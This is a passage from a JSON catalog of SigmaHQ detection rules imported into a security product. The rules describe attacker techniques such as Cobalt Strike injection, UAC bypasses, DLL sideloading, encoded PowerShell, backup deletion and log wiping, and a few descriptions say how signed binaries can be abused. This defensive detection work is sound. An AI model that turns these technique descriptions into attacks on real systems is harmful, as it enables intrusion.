"provenance": { "source": "SigmaHQ/sigma", "source_id": "614cf376-6651-47c4-9dcc-6b9527f749f4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml" } }, { "id": "sigmahq-sigma-61a7697c-cb79-42a8-a2ff-5f0cdfae0130", "type": "detection", "name": "Potential CobaltStrike Service Installations - Registry", "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1543.003", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-cobaltstrike-service-installations-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_cobaltstrike_service_installs.yml" } }, { "id": "sigmahq-sigma-61d0475c-173f-4844-86f7-f3eebae1c66b", "type": "detection", "name": "Change PowerShell Policies to an Insecure Level - PowerShell", "description": "Detects changing the PowerShell script execution policy to a potentially insecure level using the \"Set-ExecutionPolicy\" cmdlet.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, 
"playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/change-powershell-policies-to-an-insecure-level-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "61d0475c-173f-4844-86f7-f3eebae1c66b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml" } }, { "id": "sigmahq-sigma-62120148-6b7a-42be-8b91-271c04e281a3", "type": "detection", "name": "Suspicious Camera and Microphone Access", "description": "Detects Processes accessing the camera and microphone from suspicious folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1125", "T1123" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-camera-and-microphone-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "62120148-6b7a-42be-8b91-271c04e281a3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_susp_mic_cam_access.yml" } }, { "id": "sigmahq-sigma-6225c53a-a96e-4235-b28f-8d7997cd96eb", "type": "detection", "name": "Hypervisor-protected Code Integrity (HVCI) Related Registry Tampering Via CommandLine", "description": "Detects the tampering of Hypervisor-protected Code Integrity (HVCI) related 
registry values via command line tool reg.exe.\nHVCI uses virtualization-based security to protect code integrity by ensuring that only trusted code can run in kernel mode.\nAdversaries may tamper with HVCI to load malicious or unsigned drivers, which can be used to escalate privileges, maintain persistence, or evade security mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hypervisor-protected-code-integrity-hvci-related-registry-tampering-via-commandl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6225c53a-a96e-4235-b28f-8d7997cd96eb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hvci_registry_tampering.yml" } }, { "id": "sigmahq-sigma-62510e69-616b-4078-b371-847da438cc03", "type": "detection", "name": "Share And Session Enumeration Using Net.EXE", "description": "Detects attempts to enumerate file shares, printer shares and sessions using \"net.exe\" with the \"view\" flag.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/share-and-session-enumeration-using-net-exe.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "62510e69-616b-4078-b371-847da438cc03", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_net_view_share_and_sessions_enum.yml" } }, { "id": "sigmahq-sigma-62b20d44-1546-4e61-afce-8e175eb9473c", "type": "detection", "name": "Service StartupType Change Via PowerShell Set-Service", "description": "Detects the use of the PowerShell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\" or \"manual\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-startuptype-change-via-powershell-set-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "62b20d44-1546-4e61-afce-8e175eb9473c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_set_service_disabled.yml" } }, { "id": "sigmahq-sigma-62b7ccc9-23b4-471e-aa15-6da3663c4d59", "type": "detection", "name": "PowerShell Base64 Encoded Reflective Assembly Load", "description": "Detects base64 encoded .NET reflective loading of Assembly", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1027", "T1620" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-base64-encoded-reflective-assembly-load.yaml", "quarantine_reason": "imported rule; upstream query 
language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml" } }, { "id": "sigmahq-sigma-62e0298b-e994-4189-bc87-bc699aa62d97", "type": "detection", "name": "Potential Suspicious Registry File Imported Via Reg.EXE", "description": "Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-suspicious-registry-file-imported-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "62e0298b-e994-4189-bc87-bc699aa62d97", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml" } }, { "id": "sigmahq-sigma-62ed5b55-f991-406a-85d9-e8e8fdf18789", "type": "detection", "name": "UAC Bypass Using Consent and Comctl32 - File", "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", 
"tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-consent-and-comctl32-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml" } }, { "id": "sigmahq-sigma-62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", "type": "detection", "name": "Tor Client/Browser Execution", "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/tor-client-browser-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_browsers_tor_execution.yml" } }, { "id": "sigmahq-sigma-62fff148-278d-497e-8ecd-ad6083231a35", "type": "detection", "name": "OneLogin User Assumed Another User", "description": "Detects when a OneLogin user assumed another user's account. Assuming another identity grants that user's access and should be reviewed against an authorized administrative action.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, 
"verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/onelogin-user-assumed-another-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "62fff148-278d-497e-8ecd-ad6083231a35", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/onelogin/onelogin_assumed_another_user.yml" } }, { "id": "sigmahq-sigma-6309645e-122d-4c5b-bb2b-22e4f9c2fa42", "type": "detection", "name": "HackTool - Potential CobaltStrike Process Injection", "description": "Detects a potential remote thread creation with characteristics that are typical of Cobalt Strike beacon process injection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-potential-cobaltstrike-process-injection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_remote_thread/create_remote_thread_win_hktl_cobaltstrike.yml" } }, { "id": "sigmahq-sigma-631b22a4-70f4-4e2f-9ea8-42f84d9df6d8", "type": "detection", "name": "Suspicious AddinUtil.EXE CommandLine Execution", "description": "Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with suspicious Addinroot or Pipelineroot 
paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-addinutil-exe-commandline-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "631b22a4-70f4-4e2f-9ea8-42f84d9df6d8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml" } }, { "id": "sigmahq-sigma-6331d09b-4785-4c13-980f-f96661356249", "type": "detection", "name": "PowerShell Downgrade Attack - PowerShell", "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-downgrade-attack-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6331d09b-4785-4c13-980f-f96661356249", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml" } }, { "id": "sigmahq-sigma-6345b048-8441-43a7-9bed-541133633d7a", "type": "detection", "name": "ManageEngine Endpoint Central Dctask64.EXE Potential Abuse", "description": "Detects the execution of \"dctask64.exe\", a binary signed by ZOHO Corporation that ships as part of ManageEngine Endpoint Central.\nThis binary can be abused for DLL injection and arbitrary command and process execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/manageengine-endpoint-central-dctask64-exe-potential-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6345b048-8441-43a7-9bed-541133633d7a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dctask64_arbitrary_command_and_dll_execution.yml" } }, { "id": "sigmahq-sigma-634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", "type": "detection", "name": "Malicious Windows Script Components File Execution by TAEF Detection", "description": "Detects suspicious execution of te.exe, the runner for the Windows Test Authoring and Execution Framework (TAEF). TAEF runs automation by executing test files written in different languages (C, C#, Microsoft COM scripting interfaces).\nAdversaries may execute malicious code (such as a WSC file containing VBScript, a DLL, and so on) directly by running te.exe.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, 
"verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-windows-script-components-file-execution-by-taef-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml" } }, { "id": "sigmahq-sigma-6360757a-d460-456c-8b13-74cf0e60cceb", "type": "detection", "name": "Potential DLL Sideloading Via comctl32.dll", "description": "Detects potential DLL sideloading of comctl32.dll, which can be used to obtain SYSTEM privileges", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-via-comctl32-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6360757a-d460-456c-8b13-74cf0e60cceb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_comctl32.yml" } }, { "id": "sigmahq-sigma-63647769-326d-4dde-a419-b925cc0caf42", "type": "detection", "name": "Enable Microsoft Dynamic Data Exchange", "description": "Detects a registry change that enables the Dynamic Data Exchange (DDE) protocol in all supported editions of Microsoft Word or Excel. Enabling DDE allows crafted Office documents to launch commands without macros, so this setting change should be reviewed.", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1559.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/enable-microsoft-dynamic-data-exchange.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "63647769-326d-4dde-a419-b925cc0caf42", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_office_enable_dde.yml" } }, { "id": "sigmahq-sigma-636e30d5-3736-42ea-96b1-e6e2f8429fd6", "type": "detection", "name": "Azure Owner Removed From Application or Service Principal", "description": "Identifies when an owner was removed from an application or service principal in Azure. Owners can manage an application's credentials and permissions, so ownership changes should be reviewed against an authorized change.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-owner-removed-from-application-or-service-principal.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "636e30d5-3736-42ea-96b1-e6e2f8429fd6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_owner_removed_from_application_or_service_principal.yml" } }, { "id": "sigmahq-sigma-637f689e-b4a5-4a86-be0e-0100a0a33ba2", "type": "detection", "name": "HackTool - EfsPotato Named Pipe 
Creation", "description": "Detects the pattern of a pipe name as used by the hack tool EfsPotato", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-efspotato-named-pipe-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_hktl_efspotato.yml" } }, { "id": "sigmahq-sigma-6385697e-9f1b-40bd-8817-f4a91f40508e", "type": "detection", "name": "PowerShell Base64 Encoded Invoke Keyword", "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-base64-encoded-invoke-keyword.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6385697e-9f1b-40bd-8817-f4a91f40508e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_base64_invoke.yml" } }, { "id": 
"sigmahq-sigma-6393e346-1977-46ef-8987-ad414a145fad", "type": "detection", "name": "AWS ConsoleLogin Failed Authentication", "description": "Detects failed AWS console login attempts due to authentication failures. Monitoring these events is crucial for identifying potential brute-force attacks or unauthorized access attempts to AWS accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-consolelogin-failed-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6393e346-1977-46ef-8987-ad414a145fad", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_console_login_failed_authentication.yml" } }, { "id": "sigmahq-sigma-639c9081-f482-47d3-a0bd-ddee3d4ecd76", "type": "detection", "name": "All Backups Deleted Via Wbadmin.EXE", "description": "Detects the deletion of all backups or system state backups via \"wbadmin.exe\".\nThis technique is used by numerous ransomware families and actors.\nThis may only be successful on server platforms that have Windows Backup enabled.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/all-backups-deleted-via-wbadmin-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the 
AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "639c9081-f482-47d3-a0bd-ddee3d4ecd76", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wbadmin_delete_all_backups.yml" } }, { "id": "sigmahq-sigma-63bf8794-9917-45bc-88dd-e1b5abc0ecfd", "type": "detection", "name": "Powershell Install a DLL in System Directory", "description": "Uses PowerShell to install/copy a file into a system directory such as \"System32\" or \"SysWOW64\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1556.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-install-a-dll-in-system-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_copy_item_system_directory.yml" } }, { "id": "sigmahq-sigma-63c779ba-f638-40a0-a593-ddd45e8b1ddc", "type": "detection", "name": "EventLog EVTX File Deleted", "description": "Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/eventlog-evtx-file-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "63c779ba-f638-40a0-a593-ddd45e8b1ddc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_delete/file_delete_win_delete_event_log_files.yml" } }, { "id": "sigmahq-sigma-63d1ccc0-2a43-4f4b-9289-361b308991ff", "type": "detection", "name": "Wab/Wabmig Unusual Parent Or Child Processes", "description": "Detects unusual parent or child processes of wab.exe (Windows Contacts) and wabmig.exe (Microsoft Address Book Import Tool), as observed in Bumblebee malware activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wab-wabmig-unusual-parent-or-child-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml" } }, { "id": "sigmahq-sigma-63de06b9-a385-40b5-8b32-73f2b9ef84b6", "type": "detection", "name": "Fsutil Drive Enumeration", "description": "Detects the use of fsutil to enumerate connected drives. Attackers may leverage fsutil for drive enumeration during the discovery phase; expect benign administrative usage, so correlate with other activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", 
"mitre_techniques": [ "T1120" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/fsutil-drive-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "63de06b9-a385-40b5-8b32-73f2b9ef84b6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml" } }, { "id": "sigmahq-sigma-63e3365d-4824-42d8-8b82-e56810fefa0c", "type": "detection", "name": "Invoke-Obfuscation Via Use Clip - System", "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-clip-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "63e3365d-4824-42d8-8b82-e56810fefa0c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_clip_services.yml" } }, { "id": "sigmahq-sigma-63e4f530-65dc-49cc-8f80-ccfa95c69d43", "type": "detection", "name": "UAC Bypass Using EventVwr", "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", "version": "1.0.0", "author": "AiSOC", 
"tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-eventvwr.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml" } }, { "id": "sigmahq-sigma-6414b5cd-b19d-447e-bb5e-9f03940b5784", "type": "detection", "name": "Potential DLL Sideloading Of DBGHELP.DLL", "description": "Detects potential DLL sideloading of \"dbghelp.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-of-dbghelp-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { 